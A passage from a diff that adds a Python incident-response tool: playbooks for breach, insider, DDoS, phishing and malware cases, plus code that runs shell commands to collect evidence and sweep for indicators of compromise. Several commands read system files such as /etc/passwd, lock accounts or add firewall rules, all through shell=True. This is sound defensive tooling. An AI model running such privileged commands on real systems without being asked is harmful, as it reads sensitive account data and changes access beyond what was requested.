trade secrets were involved. Assess regulatory implications.', + 'check_items': ['Classify data types affected', 'Estimate number of records', 'Determine if PII/PHI involved', 'Check for financial data exposure', 'Identify regulatory frameworks triggered'], + 'automated': False, + 'commands': [], + }, + { + 'title': 'Notify Stakeholders', + 'description': 'Notify required parties according to regulatory requirements and company policy. This may include legal, management, affected individuals, and regulators.', + 'check_items': ['Notify legal counsel', 'Notify executive management', 'Prepare notification to affected individuals', 'File regulatory notifications (GDPR 72hr, HIPAA 60 days)', 'Notify law enforcement if appropriate', 'Prepare public statement if needed'], + 'automated': False, + 'commands': [], + }, + { + 'title': 'Remediate and Harden', + 'description': 'Fix the vulnerability or weakness that allowed the breach. Implement additional security controls and monitoring.', + 'check_items': ['Patch exploited vulnerability', 'Implement additional access controls', 'Enable MFA on affected systems', 'Deploy DLP controls', 'Enhance monitoring and alerting'], + 'automated': False, + 'commands': [], + }, + { + 'title': 'Post-Incident Review', + 'description': 'Document full incident timeline, root cause analysis, and lessons learned. Update policies, procedures, and detection rules.', + 'check_items': ['Complete incident report', 'Conduct root cause analysis', 'Update incident response plan', 'Implement improved controls', 'Schedule follow-up review'], + 'automated': False, + 'commands': [], + }, + ], + }, + 'insider_threat': { + 'name': 'Insider Threat Response', + 'steps': [ + { + 'title': 'Identify and Verify Threat', + 'description': 'Confirm the insider threat indicators. Determine if activity is malicious or accidental. Review user activity logs, access patterns, and data movement.', + 'check_items': ['Review user access logs', 'Check data transfer volumes', 'Verify anomalous login patterns', 'Review email/messaging for exfiltration', 'Confirm with HR if termination-related'], + 'automated': True, + 'commands': ['wevtutil qe Security /c:100 /f:text /rd:true /q:"*[System[(EventID=4624 or EventID=4625)]]"' if _is_win else 'last -20 2>/dev/null; lastlog 2>/dev/null | head -20'], + }, + { + 'title': 'Monitor Covertly', + 'description': 'If investigation is underway, continue monitoring the insider without alerting them. Coordinate with legal and HR before taking action.', + 'check_items': ['Enable enhanced audit logging', 'Monitor file access patterns', 'Track network activity from user workstation', 'Coordinate with HR and legal', 'Document all observations'], + 'automated': True, + 'commands': ['auditpol /get /category:*' if _is_win else 'auditctl -l 2>/dev/null'], + }, + { + 'title': 'Contain the Threat', + 'description': 'When ready to act, disable the user account, revoke all access, and secure their workstation. Preserve all evidence before wiping anything.', + 'check_items': ['Disable user account', 'Revoke VPN/remote access', 'Revoke cloud service access', 'Secure physical workstation', 'Collect badges and keys', 'Disable email forwarding rules'], + 'automated': True, + 'commands': ['net user {username} /active:no' if _is_win else 'usermod -L {username} 2>/dev/null'], + }, + { + 'title': 'Forensic Investigation', + 'description': 'Conduct thorough forensic analysis of the insider\'s workstation, email, cloud storage, and all systems they had access to.', + 'check_items': ['Image workstation hard drive', 'Review email sent items and drafts', 'Check USB device history', 'Review cloud storage activity', 'Check print logs', 'Review source code repository commits'], + 'automated': False, + 'commands': [], + }, + { + 'title': 'Assess Damage', + 'description': 'Determine what data was accessed, copied, or destroyed. Assess intellectual property theft, competitive harm, and regulatory impact.', + 'check_items': ['Inventory accessed files', 'Determine data classification', 'Assess competitive damage', 'Check for data destruction', 'Review customer data exposure'], + 'automated': False, + 'commands': [], + }, + { + 'title': 'Recovery and Remediation', + 'description': 'Rotate credentials, revoke remaining access, and implement controls to prevent similar incidents.', + 'check_items': ['Rotate shared credentials', 'Review access control lists', 'Implement separation of duties', 'Update DLP policies', 'Enhance user behavior analytics'], + 'automated': False, + 'commands': [], + }, + ], + }, + 'ddos': { + 'name': 'DDoS Response', + 'steps': [ + { + 'title': 'Detect and Classify Attack', + 'description': 'Identify the type of DDoS attack (volumetric, protocol, application layer). Determine attack vector, source IPs, and traffic patterns.', + 'check_items': ['Identify attack type', 'Measure attack bandwidth', 'Identify source IP ranges', 'Determine targeted services', 'Check if amplification/reflection attack'], + 'automated': True, + 'commands': ['netstat -an | find /c "ESTABLISHED"' if _is_win else 'ss -s; netstat -an 2>/dev/null | awk \'{print $5}\' | cut -d: -f1 | sort | uniq -c | sort -rn | head -20'], + }, + { + 'title': 'Activate Upstream Mitigation', + 'description': 'Contact ISP and activate DDoS mitigation services. Enable CDN/WAF protections. Activate cloud-based scrubbing if available.', + 'check_items': ['Contact ISP for upstream filtering', 'Activate CDN DDoS protection', 'Enable WAF rate limiting', 'Activate cloud scrubbing service', 'Implement geo-blocking if appropriate'], + 'automated': False, + 'commands': [], + }, + { + 'title': 'Apply Local Mitigations', + 'description': 'Implement local firewall rules to drop attack traffic. Enable SYN cookies, rate limiting, and connection limits. Block identified source IPs.', + 'check_items': ['Enable SYN flood protection', 'Apply rate limiting rules', 'Block top attacking IPs', 'Increase connection table size', 'Drop malformed packets'], + 'automated': True, + 'commands': ['netsh advfirewall firewall add rule name="DDoS-RateLimit" dir=in action=block enable=yes' if _is_win else 'sysctl -w net.ipv4.tcp_syncookies=1; sysctl -w net.ipv4.tcp_max_syn_backlog=2048'], + }, + { + 'title': 'Monitor and Adapt', + 'description': 'Continuously monitor attack patterns. Attackers often shift vectors when initial attack is mitigated. Update filtering rules as patterns change.', + 'check_items': ['Monitor bandwidth utilization', 'Track connection states', 'Watch for attack vector changes', 'Update filtering rules', 'Monitor service availability'], + 'automated': True, + 'commands': ['netstat -an' if _is_win else 'ss -s'], + }, + { + 'title': 'Service Recovery', + 'description': 'Once attack subsides, gradually restore services. Verify all systems are functioning normally. Clear any queued requests.', + 'check_items': ['Verify attack has stopped', 'Remove emergency firewall rules', 'Restart affected services', 'Clear connection queues', 'Verify service availability'], + 'automated': False, + 'commands': [], + }, + { + 'title': 'Post-Attack Analysis', + 'description': 'Analyze attack traffic patterns for future prevention. Update DDoS response procedures. Consider additional protection services.', + 'check_items': ['Analyze attack traffic logs', 'Document attack timeline', 'Review effectiveness of mitigations', 'Update firewall rules permanently', 'Evaluate DDoS protection services'], + 'automated': False, + 'commands': [], + }, + ], + }, + 'account_compromise': { + 'name': 'Account Compromise Response', + 'steps': [ + { + 'title': 'Confirm Compromise', + 'description': 'Verify that the account has been compromised. Check for unauthorized logins, unusual activity, email forwarding rules, and new MFA devices.', + 'check_items': ['Review login history for anomalies', 'Check for new email forwarding rules', 'Look for new MFA devices', 'Review recent account activity', 'Check for password change attempts'], + 'automated': True, + 'commands': ['wevtutil qe Security /c:30 /f:text /rd:true /q:"*[System[(EventID=4624)]]"' if _is_win else 'last -30 2>/dev/null; grep "session opened" /var/log/auth.log 2>/dev/null | tail -30'], + }, + { + 'title': 'Secure the Account', + 'description': 'Reset the password immediately. Revoke all active sessions and tokens. Remove unauthorized MFA devices. Remove suspicious email rules.', + 'check_items': ['Reset account password', 'Revoke all active sessions', 'Remove unauthorized MFA devices', 'Remove email forwarding rules', 'Revoke OAuth application access'], + 'automated': True, + 'commands': ['net user {username} * /domain' if _is_win else 'passwd {username}'], + }, + { + 'title': 'Assess Impact', + 'description': 'Determine what the attacker accessed using the compromised account. Check email, files, systems, and any actions taken.', + 'check_items': ['Review email access logs', 'Check file access history', 'Review system authentication logs', 'Look for data exfiltration', 'Check for lateral movement'], + 'automated': False, + 'commands': [], + }, + { + 'title': 'Check for Lateral Movement', + 'description': 'Determine if the attacker used the compromised account to access other systems or escalate privileges.', + 'check_items': ['Check other systems for the compromised credential', 'Review admin console access', 'Look for privilege escalation', 'Check for new accounts created', 'Review VPN connection logs'], + 'automated': True, + 'commands': ['net user' if _is_win else 'cat /etc/passwd | grep -v nologin'], + }, + { + 'title': 'Remediate and Harden', + 'description': 'Implement additional security controls on the account and related systems.', + 'check_items': ['Enable MFA if not already active', 'Review account permissions', 'Implement conditional access policies', 'Update password policy', 'Enable login anomaly detection'], + 'automated': False, + 'commands': [], + }, + ], + }, + 'malware': { + 'name': 'Malware Incident Response', + 'steps': [ + { + 'title': 'Identify and Isolate', + 'description': 'Identify the malware and isolate the affected system. Determine the malware type (trojan, worm, RAT, rootkit, etc.) and initial infection vector.', + 'check_items': ['Identify malware file/process', 'Isolate affected system from network', 'Determine malware type', 'Identify initial infection vector', 'Check if malware is actively communicating'], + 'automated': True, + 'commands': ['tasklist /v' if _is_win else 'ps auxf', + 'netstat -anob' if _is_win else 'ss -tulnp', + 'wmic process list full' if _is_win else 'ls -la /tmp /var/tmp /dev/shm 2>/dev/null'], + }, + { + 'title': 'Collect Malware Sample', + 'description': 'Safely collect the malware binary for analysis. Calculate hashes (MD5, SHA256) and check against threat intelligence databases.', + 'check_items': ['Copy malware sample to quarantine', 'Calculate file hashes', 'Submit to VirusTotal', 'Check threat intel feeds', 'Document file metadata'], + 'automated': False, + 'commands': [], + }, + { + 'title': 'Analyze Behavior', + 'description': 'Determine malware capabilities: C2 communication, persistence, data exfiltration, privilege escalation, and lateral movement.', + 'check_items': ['Identify C2 domains/IPs', 'Check persistence mechanisms', 'Identify data exfiltration channels', 'Check for privilege escalation', 'Look for dropper/downloader behavior'], + 'automated': True, + 'commands': ['schtasks /query /fo LIST /v' if _is_win else 'crontab -l 2>/dev/null', + 'reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' if _is_win else 'systemctl list-unit-files --state=enabled 2>/dev/null'], + }, + { + 'title': 'Scope the Infection', + 'description': 'Determine if other systems are infected. Sweep the network for IOCs found during analysis.', + 'check_items': ['Sweep network for IOCs', 'Check DNS logs for C2 domains', 'Review network flow data', 'Check other endpoints for same hash', 'Look for worm propagation'], + 'automated': False, + 'commands': [], + }, + { + 'title': 'Eradicate Malware', + 'description': 'Remove all malware components from affected systems. Clean persistence mechanisms, remove dropped files, and clear modified registry entries.', + 'check_items': ['Remove malware binaries', 'Clear persistence entries', 'Remove dropped files', 'Clean registry modifications', 'Verify clean with multiple AV engines'], + 'automated': False, + 'commands': [], + }, + { + 'title': 'Recover and Monitor', + 'description': 'Restore system to clean state. Patch the vulnerability used for initial access. Monitor for reinfection.', + 'check_items': ['Restore from clean backup if needed', 'Apply security patches', 'Update AV signatures', 'Monitor for reinfection indicators', 'Update detection rules with new IOCs'], + 'automated': False, + 'commands': [], + }, + ], + }, + 'phishing': { + 'name': 'Phishing Incident Response', + 'steps': [ + { + 'title': 'Analyze the Phishing Email', + 'description': 'Examine the phishing email headers, sender, links, and attachments. Determine the campaign scope and targets.', + 'check_items': ['Examine email headers for origin', 'Analyze URLs (do not click)', 'Check attachments in sandbox', 'Identify phishing kit or campaign', 'Determine number of recipients'], + 'automated': False, + 'commands': [], + }, + { + 'title': 'Identify Affected Users', + 'description': 'Determine which users received, opened, clicked links, or submitted credentials to the phishing page.', + 'check_items': ['Query email gateway for all recipients', 'Check proxy logs for phishing URL visits', 'Review web filter logs', 'Identify users who submitted credentials', 'Check for downloaded attachments'], + 'automated': True, + 'commands': ['ipconfig /displaydns' if _is_win else 'cat /etc/resolv.conf; grep -r "dns" /var/log/ 2>/dev/null | tail -20'], + }, + { + 'title': 'Contain the Threat', + 'description': 'Block the phishing URLs and sender addresses. Reset credentials for affected users. Purge remaining phishing emails from inboxes.', + 'check_items': ['Block phishing URL at proxy/firewall', 'Block sender email address', 'Reset passwords for affected users', 'Purge phishing email from all mailboxes', 'Block phishing domain in DNS'], + 'automated': True, + 'commands': ['netsh advfirewall firewall add rule name="Block-Phish" dir=out action=block remoteip={ip}' if _is_win else 'iptables -A OUTPUT -d {ip} -j DROP'], + }, + { + 'title': 'Check for Secondary Compromise', + 'description': 'If users clicked links or submitted credentials, check for follow-on compromise: unauthorized access, malware installation, data theft.', + 'check_items': ['Check for unauthorized logins with stolen creds', 'Scan workstations for malware', 'Review data access logs', 'Check for OAuth token theft', 'Look for lateral movement'], + 'automated': False, + 'commands': [], + }, + { + 'title': 'Remediate', + 'description': 'Ensure all affected accounts are secured. Update email filtering rules. Deploy additional protections.', + 'check_items': ['Verify all affected passwords reset', 'Enable MFA for affected accounts', 'Update email filter rules', 'Add phishing indicators to blocklists', 'Submit phishing page for takedown'], + 'automated': False, + 'commands': [], + }, + { + 'title': 'User Awareness', + 'description': 'Notify users about the phishing campaign. Provide guidance on identifying phishing. Consider additional security awareness training.', + 'check_items': ['Send company-wide alert about campaign', 'Provide phishing identification tips', 'Schedule security awareness training', 'Update phishing simulation program', 'Document lessons learned'], + 'automated': False, + 'commands': [], + }, + ], + }, + 'unauthorized_access': { + 'name': 'Unauthorized Access Response', + 'steps': [ + { + 'title': 'Detect and Confirm', + 'description': 'Verify unauthorized access indicators. Review authentication logs, IDS/IPS alerts, and anomalous activity.', + 'check_items': ['Review authentication logs', 'Check IDS/IPS alerts', 'Verify anomalous access patterns', 'Identify accessed resources', 'Determine access method (exploit, stolen creds, misconfiguration)'], + 'automated': True, + 'commands': ['wevtutil qe Security /c:50 /f:text /rd:true' if _is_win else 'grep -i "accepted\\|failed\\|invalid" /var/log/auth.log 2>/dev/null | tail -50'], + }, + { + 'title': 'Block Attacker Access', + 'description': 'Immediately block the attacker\'s access. Firewall the source IP, disable exploited service, close the vulnerability.', + 'check_items': ['Block attacker IP at firewall', 'Disable exploited service', 'Close vulnerable ports', 'Revoke any created credentials', 'Reset compromised accounts'], + 'automated': True, + 'commands': ['netsh advfirewall firewall add rule name="Block-Attacker" dir=in action=block remoteip={ip}' if _is_win else 'iptables -A INPUT -s {ip} -j DROP'], + }, + { + 'title': 'Preserve Evidence', + 'description': 'Capture all evidence of the intrusion before remediation changes it.', + 'check_items': ['Capture running processes', 'Save network connections', 'Preserve log files', 'Save modified files list', 'Document access timeline'], + 'automated': True, + 'commands': ['tasklist /v' if _is_win else 'ps auxf', + 'netstat -anob' if _is_win else 'ss -tulnp', + 'dir /t:w /o:-d /s C:\\Users' if _is_win else 'find / -mtime -1 -type f 2>/dev/null | head -100'], + }, + { + 'title': 'Assess Scope and Impact', + 'description': 'Determine what the attacker accessed, modified, or exfiltrated. Check for backdoors, new accounts, and persistence mechanisms.', + 'check_items': ['Check for new user accounts', 'Look for backdoors and webshells', 'Review file modification times', 'Check for data exfiltration', 'Look for persistence mechanisms'], + 'automated': True, + 'commands': ['net user' if _is_win else 'cat /etc/passwd', + 'schtasks /query /fo LIST' if _is_win else 'crontab -l 2>/dev/null'], + }, + { + 'title': 'Eradicate and Harden', + 'description': 'Remove all attacker artifacts. Patch the exploited vulnerability. Harden the system against future attacks.', + 'check_items': ['Remove attacker backdoors', 'Patch exploited vulnerability', 'Remove unauthorized accounts', 'Harden service configurations', 'Update firewall rules', 'Enable enhanced logging'], + 'automated': False, + 'commands': [], + }, + { + 'title': 'Post-Incident Review', + 'description': 'Document the full attack chain. Update detection rules and security controls. Implement lessons learned.', + 'check_items': ['Document complete attack chain', 'Update IDS/IPS signatures', 'Review and update access controls', 'Implement additional monitoring', 'Schedule penetration test'], + 'automated': False, + 'commands': [], + }, + ], + }, +} + + +# ── Incident Response Engine ──────────────────────────────────────── + +class IncidentResponse: + """IR playbook runner, evidence collector, IOC sweeper, and reporting engine.""" + + _instance = None + + def __init__(self): + data_dir = get_data_dir() + if isinstance(data_dir, str): + data_dir = Path(data_dir) + self._incidents_dir = data_dir / 'incidents' + self._incidents_dir.mkdir(parents=True, exist_ok=True) + + # ── helpers ────────────────────────────────────────────────── + + def _run_cmd(self, cmd, timeout=30): + """Run a shell command, return (success, output).""" + try: + result = subprocess.run(cmd, shell=True, capture_output=True, + text=True, timeout=timeout) + return result.returncode == 0, result.stdout.strip() + except Exception as e: + return False, str(e) + + def _now_iso(self): + return datetime.now(timezone.utc).isoformat() + + def _gen_id(self): + """Generate a unique incident ID like IR-20260303-A1B2.""" + ts = datetime.now().strftime('%Y%m%d') + suffix = hashlib.md5(str(time.time()).encode()).hexdigest()[:4].upper() + return f'IR-{ts}-{suffix}' + + def _incident_dir(self, incident_id): + d = self._incidents_dir / incident_id + d.mkdir(parents=True, exist_ok=True) + return d + + def _load_incident(self, incident_id): + path = self._incident_dir(incident_id) / 'incident.json' + if not path.exists(): + return None + with open(path, 'r') as f: + return json.load(f) + + def _save_incident(self, incident): + idir = self._incident_dir(incident['id']) + with open(idir / 'incident.json', 'w') as f: + json.dump(incident, f, indent=2, default=str) + + def _load_timeline(self, incident_id): + path = self._incident_dir(incident_id) / 'timeline.json' + if not path.exists(): + return [] + with open(path, 'r') as f: + return json.load(f) + + def _save_timeline(self, incident_id, timeline): + path = self._incident_dir(incident_id) / 'timeline.json' + with open(path, 'w') as f: + json.dump(timeline, f, indent=2, default=str) + + def _evidence_dir(self, incident_id): + d = self._incident_dir(incident_id) / 'evidence' + d.mkdir(parents=True, exist_ok=True) + return d + + # ── CRUD ───────────────────────────────────────────────────── + + def create_incident(self, name, incident_type, severity, description=''): + """Create a new incident case and return the incident dict.""" + if incident_type not in INCIDENT_TYPES: + return {'error': f'Invalid type. Must be one of: {", ".join(INCIDENT_TYPES)}'} + if severity not in SEVERITY_LEVELS: + return {'error': f'Invalid severity. Must be one of: {", ".join(SEVERITY_LEVELS)}'} + + incident_id = self._gen_id() + playbook = IR_PLAYBOOKS.get(incident_type, {}) + step_count = len(playbook.get('steps', [])) + + incident = { + 'id': incident_id, + 'name': name, + 'type': incident_type, + 'severity': severity, + 'description': description, + 'status': 'open', + 'assignee': '', + 'notes': '', + 'created': self._now_iso(), + 'updated': self._now_iso(), + 'closed': None, + 'resolution_notes': '', + 'playbook_progress': [False] * step_count, + 'playbook_outputs': [''] * step_count, + 'evidence_count': 0, + } + self._save_incident(incident) + self._save_timeline(incident_id, []) + + # add creation event to timeline + self.add_timeline_event(incident_id, self._now_iso(), + f'Incident created: {name}', 'system', + f'Type: {incident_type}, Severity: {severity}') + return incident + + def get_incident(self, incident_id): + """Return full incident details including timeline and evidence list.""" + incident = self._load_incident(incident_id) + if not incident: + return {'error': 'Incident not found'} + incident['timeline'] = self._load_timeline(incident_id) + incident['evidence'] = self.list_evidence(incident_id) + return incident + + def list_incidents(self, status=None): + """Return list of all incidents, optionally filtered by status.""" + incidents = [] + if not self._incidents_dir.exists(): + return incidents + for d in sorted(self._incidents_dir.iterdir(), reverse=True): + if d.is_dir(): + inc = self._load_incident(d.name) + if inc: + if status and inc.get('status') != status: + continue + incidents.append(inc) + return incidents + + def update_incident(self, incident_id, updates): + """Update incident fields (status, severity, notes, assignee).""" + incident = self._load_incident(incident_id) + if not incident: + return {'error': 'Incident not found'} + + allowed = {'status', 'severity', 'notes', 'assignee', 'name', 'description'} + changes = [] + for key, val in updates.items(): + if key in allowed: + old_val = incident.get(key, '') + if old_val != val: + incident[key] = val + changes.append(f'{key}: {old_val} -> {val}') + + if 'status' in updates and updates['status'] not in STATUS_VALUES: + return {'error': f'Invalid status. Must be one of: {", ".join(STATUS_VALUES)}'} + if 'severity' in updates and updates['severity'] not in SEVERITY_LEVELS: + return {'error': f'Invalid severity. Must be one of: {", ".join(SEVERITY_LEVELS)}'} + + incident['updated'] = self._now_iso() + self._save_incident(incident) + + if changes: + self.add_timeline_event(incident_id, self._now_iso(), + 'Incident updated', 'system', + '; '.join(changes)) + return incident + + def close_incident(self, incident_id, resolution_notes=''): + """Close an incident with resolution notes.""" + incident = self._load_incident(incident_id) + if not incident: + return {'error': 'Incident not found'} + + incident['status'] = 'closed' + incident['closed'] = self._now_iso() + incident['updated'] = self._now_iso() + incident['resolution_notes'] = resolution_notes + self._save_incident(incident) + + self.add_timeline_event(incident_id, self._now_iso(), + 'Incident closed', 'system', resolution_notes) + return incident + + def delete_incident(self, incident_id): + """Delete an incident and all associated data.""" + idir = self._incidents_dir / incident_id + if not idir.exists(): + return {'error': 'Incident not found'} + shutil.rmtree(str(idir), ignore_errors=True) + return {'success': True, 'deleted': incident_id} + + # ── Playbooks ──────────────────────────────────────────────── + + def get_playbook(self, incident_type): + """Return the IR playbook for an incident type.""" + pb = IR_PLAYBOOKS.get(incident_type) + if not pb: + return {'error': f'No playbook for type: {incident_type}'} + return pb + + def run_playbook_step(self, incident_id, step_index, auto=False): + """Execute or mark a playbook step as done.""" + incident = self._load_incident(incident_id) + if not incident: + return {'error': 'Incident not found'} + + playbook = IR_PLAYBOOKS.get(incident['type'], {}) + steps = playbook.get('steps', []) + if step_index < 0 or step_index >= len(steps): + return {'error': f'Invalid step index: {step_index}'} + + step = steps[step_index] + output = '' + + if auto and step.get('automated') and step.get('commands'): + # Run the commands and capture output + outputs = [] + for cmd in step['commands']: + success, result = self._run_cmd(cmd) + outputs.append(f'$ {cmd}\n{result}\n{"[OK]" if success else "[FAILED]"}') + output = '\n\n'.join(outputs) + + # Store the output as evidence + self.add_evidence(incident_id, + f'playbook_step_{step_index}_{step["title"].replace(" ", "_")}', + output, evidence_type='playbook_auto') + + # Mark step as complete + progress = incident.get('playbook_progress', []) + while len(progress) <= step_index: + progress.append(False) + progress[step_index] = True + + pb_outputs = incident.get('playbook_outputs', []) + while len(pb_outputs) <= step_index: + pb_outputs.append('') + pb_outputs[step_index] = output + + incident['playbook_progress'] = progress + incident['playbook_outputs'] = pb_outputs + incident['updated'] = self._now_iso() + + # auto-advance status + if incident['status'] == 'open': + incident['status'] = 'investigating' + + self._save_incident(incident) + self.add_timeline_event(incident_id, self._now_iso(), + f'Playbook step completed: {step["title"]}', + 'playbook', + f'Step {step_index + 1}/{len(steps)}, auto={auto}') + + return { + 'step_index': step_index, + 'title': step['title'], + 'completed': True, + 'auto': auto, + 'output': output, + 'progress': progress, + } + + # ── Evidence Collection ────────────────────────────────────── + + def collect_evidence(self, incident_id, evidence_type, source=None): + """Collect evidence from the local system and store it under the incident.""" + incident = self._load_incident(incident_id) + if not incident: + return {'error': 'Incident not found'} + if evidence_type not in EVIDENCE_TYPES: + return {'error': f'Unknown evidence type. Options: {", ".join(EVIDENCE_TYPES)}'} + + content = '' + name = evidence_type + + if evidence_type == 'system_logs': + if _is_win: + _, content = self._run_cmd( + 'wevtutil qe System /c:50 /f:text /rd:true', timeout=20) + _, auth = self._run_cmd( + 'wevtutil qe Security /c:50 /f:text /rd:true', timeout=20) + content = f'=== System Log ===\n{content}\n\n=== Security Log ===\n{auth}' + else: + parts = [] + for log in ['/var/log/syslog', '/var/log/messages', '/var/log/auth.log', + '/var/log/secure', '/var/log/kern.log']: + _, out = self._run_cmd(f'tail -100 {log} 2>/dev/null') + if out: + parts.append(f'=== {log} ===\n{out}') + content = '\n\n'.join(parts) if parts else 'No accessible logs found' + + elif evidence_type == 'process_list': + if _is_win: + _, content = self._run_cmd('tasklist /v /fo csv', timeout=15) + else: + _, content = self._run_cmd('ps auxf', timeout=15) + + elif evidence_type == 'network_connections': + if _is_win: + _, content = self._run_cmd('netstat -anob', timeout=15) + else: + _, content = self._run_cmd('ss -tulnp 2>/dev/null || netstat -tulnp 2>/dev/null', timeout=15) + + elif evidence_type == 'running_services': + if _is_win: + _, content = self._run_cmd('sc query state= all', timeout=20) + else: + _, content = self._run_cmd('systemctl list-units --type=service --state=running 2>/dev/null || service --status-all 2>/dev/null', timeout=15) + + elif evidence_type == 'user_accounts': + if _is_win: + _, content = self._run_cmd('net user', timeout=10) + _, detailed = self._run_cmd('wmic useraccount list full', timeout=15) + content = f'{content}\n\n=== Detailed ===\n{detailed}' + else: + _, content = self._run_cmd('cat /etc/passwd; echo "---"; last -20 2>/dev/null', timeout=10) + + elif evidence_type == 'scheduled_tasks': + if _is_win: + _, content = self._run_cmd('schtasks /query /fo LIST /v', timeout=20) + else: + parts = [] + _, out = self._run_cmd('crontab -l 2>/dev/null') + if out: + parts.append(f'=== User Crontab ===\n{out}') + _, out = self._run_cmd('ls -la /etc/cron.d/ /etc/cron.daily/ /etc/cron.hourly/ /etc/cron.weekly/ /etc/cron.monthly/ 2>/dev/null') + if out: + parts.append(f'=== System Cron ===\n{out}') + _, out = self._run_cmd('systemctl list-timers --all 2>/dev/null') + if out: + parts.append(f'=== Systemd Timers ===\n{out}') + content = '\n\n'.join(parts) if parts else 'No scheduled tasks found' + + elif evidence_type == 'recent_files': + if _is_win: + _, content = self._run_cmd( + 'forfiles /P C:\\Users /S /D -1 /C "cmd /c echo @path @fdate @ftime" 2>nul', + timeout=30) + if not content: + _, content = self._run_cmd('dir /t:w /o:-d /s C:\\Users\\*.*', timeout=30) + else: + _, content = self._run_cmd( + 'find /home /tmp /var/tmp /root -mtime -1 -type f 2>/dev/null | head -200', + timeout=30) + + elif evidence_type == 'memory_info': + if _is_win: + _, content = self._run_cmd( + 'systeminfo | findstr /C:"Total Physical" /C:"Available Physical" /C:"Virtual Memory"', + timeout=15) + _, procs = self._run_cmd( + 'wmic process get Name,WorkingSetSize,ProcessId /format:csv', timeout=15) + content = f'{content}\n\n=== Top Processes ===\n{procs}' + else: + _, content = self._run_cmd('free -h; echo "---"; cat /proc/meminfo | head -20', timeout=10) + + elif evidence_type == 'disk_info': + if _is_win: + _, content = self._run_cmd('wmic logicaldisk get size,freespace,caption', timeout=10) + else: + _, content = self._run_cmd('df -h; echo "---"; lsblk 2>/dev/null', timeout=10) + + elif evidence_type == 'installed_software': + if _is_win: + _, content = self._run_cmd( + 'wmic product get name,version /format:csv 2>nul', timeout=30) + if not content: + _, content = self._run_cmd( + 'reg query "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall" /s /v DisplayName 2>nul', + timeout=20) + else: + _, content = self._run_cmd( + 'dpkg -l 2>/dev/null || rpm -qa 2>/dev/null || pacman -Q 2>/dev/null', + timeout=20) + + # Save evidence + return self.add_evidence(incident_id, name, content, evidence_type='collected') + + def add_evidence(self, incident_id, name, content, evidence_type='manual'): + """Add evidence (manual note, collected data, etc.) to an incident.""" + incident = self._load_incident(incident_id) + if not incident: + return {'error': 'Incident not found'} + + edir = self._evidence_dir(incident_id) + ts = datetime.now().strftime('%Y%m%d_%H%M%S') + safe_name = re.sub(r'[^a-zA-Z0-9_-]', '_', name) + filename = f'{ts}_{safe_name}.txt' + filepath = edir / filename + + with open(filepath, 'w', encoding='utf-8', errors='replace') as f: + f.write(content) + + # Update evidence count + incident['evidence_count'] = incident.get('evidence_count', 0) + 1 + incident['updated'] = self._now_iso() + self._save_incident(incident) + + # Log in timeline + self.add_timeline_event(incident_id, self._now_iso(), + f'Evidence added: {name}', 'evidence', + f'Type: {evidence_type}, File: {filename}, Size: {len(content)} bytes') + + return { + 'name': name, + 'filename': filename, + 'type': evidence_type, + 'size': len(content), + 'collected_at': self._now_iso(), + 'preview': content[:500] if content else '', + } + + def list_evidence(self, incident_id): + """List all evidence files for an incident.""" + edir = self._evidence_dir(incident_id) + evidence = [] + if not edir.exists(): + return evidence + for f in sorted(edir.iterdir()): + if f.is_file(): + stat = f.stat() + evidence.append({ + 'filename': f.name, + 'name': f.stem, + 'size': stat.st_size, + 'collected_at': datetime.fromtimestamp(stat.st_mtime).isoformat(), + }) + return evidence + + def get_evidence_content(self, incident_id, filename): + """Return the content of a specific evidence file.""" + filepath = self._evidence_dir(incident_id) / filename + if not filepath.exists(): + return {'error': 'Evidence file not found'} + try: + content = filepath.read_text(encoding='utf-8', errors='replace') + return {'filename': filename, 'content': content, 'size': len(content)} + except Exception as e: + return {'error': str(e)} + + # ── IOC Sweep ──────────────────────────────────────────────── + + def sweep_iocs(self, incident_id, iocs): + """Scan local system for indicators of compromise. + + iocs = { + 'ips': ['1.2.3.4', ...], + 'domains': ['evil.com', ...], + 'hashes': ['sha256:abcdef...', ...], + } + """ + incident = self._load_incident(incident_id) + if not incident: + return {'error': 'Incident not found'} + + matches = [] + ip_list = [ip.strip() for ip in iocs.get('ips', []) if ip.strip()] + domain_list = [d.strip() for d in iocs.get('domains', []) if d.strip()] + hash_list = [h.strip() for h in iocs.get('hashes', []) if h.strip()] + + # Check network connections against IP list + if ip_list: + if _is_win: + _, netout = self._run_cmd('netstat -an') + else: + _, netout = self._run_cmd('ss -tulnp 2>/dev/null || netstat -tulnp 2>/dev/null') + + for ip in ip_list: + if ip in netout: + matches.append({ + 'type': 'ip', + 'ioc': ip, + 'found_in': 'active_connections', + 'severity': 'critical', + 'details': f'IP {ip} found in active network connections', + }) + + # Check running processes against hash list + if hash_list: + if _is_win: + _, proc_out = self._run_cmd('wmic process get ExecutablePath /format:csv') + proc_paths = [line.split(',')[-1].strip() for line in proc_out.splitlines() + if '\\' in line] + else: + _, proc_out = self._run_cmd("ls -1 /proc/*/exe 2>/dev/null | xargs readlink 2>/dev/null | sort -u") + proc_paths = [p.strip() for p in proc_out.splitlines() if p.strip()] + + for proc_path in proc_paths: + if not os.path.isfile(proc_path): + continue + try: + sha = hashlib.sha256(open(proc_path, 'rb').read()).hexdigest() + md5 = hashlib.md5(open(proc_path, 'rb').read()).hexdigest() + for h in hash_list: + hval = h.split(':')[-1] if ':' in h else h + if hval.lower() in (sha.lower(), md5.lower()): + matches.append({ + 'type': 'hash', + 'ioc': h, + 'found_in': proc_path, + 'severity': 'critical', + 'details': f'Hash match on running process: {proc_path}', + }) + except (PermissionError, OSError): + continue + + # Check DNS cache against domain list + if domain_list: + if _is_win: + _, dns_out = self._run_cmd('ipconfig /displaydns') + else: + _, dns_out = self._run_cmd( + 'cat /etc/hosts 2>/dev/null; ' + 'grep -r "query" /var/log/syslog 2>/dev/null | tail -200') + + for domain in domain_list: + if domain.lower() in dns_out.lower(): + matches.append({ + 'type': 'domain', + 'ioc': domain, + 'found_in': 'dns_cache', + 'severity': 'high', + 'details': f'Domain {domain} found in DNS cache/logs', + }) + + # Store sweep results as evidence + result = { + 'total_iocs': len(ip_list) + len(domain_list) + len(hash_list), + 'matches_found': len(matches), + 'matches': matches, + 'swept_at': self._now_iso(), + } + + self.add_evidence(incident_id, 'ioc_sweep_results', + json.dumps(result, indent=2), evidence_type='ioc_sweep') + + self.add_timeline_event(incident_id, self._now_iso(), + f'IOC sweep completed: {len(matches)} matches from {result["total_iocs"]} indicators', + 'sweep', json.dumps({'matches': len(matches)})) + + return result + + # ── Timeline ───────────────────────────────────────────────── + + def add_timeline_event(self, 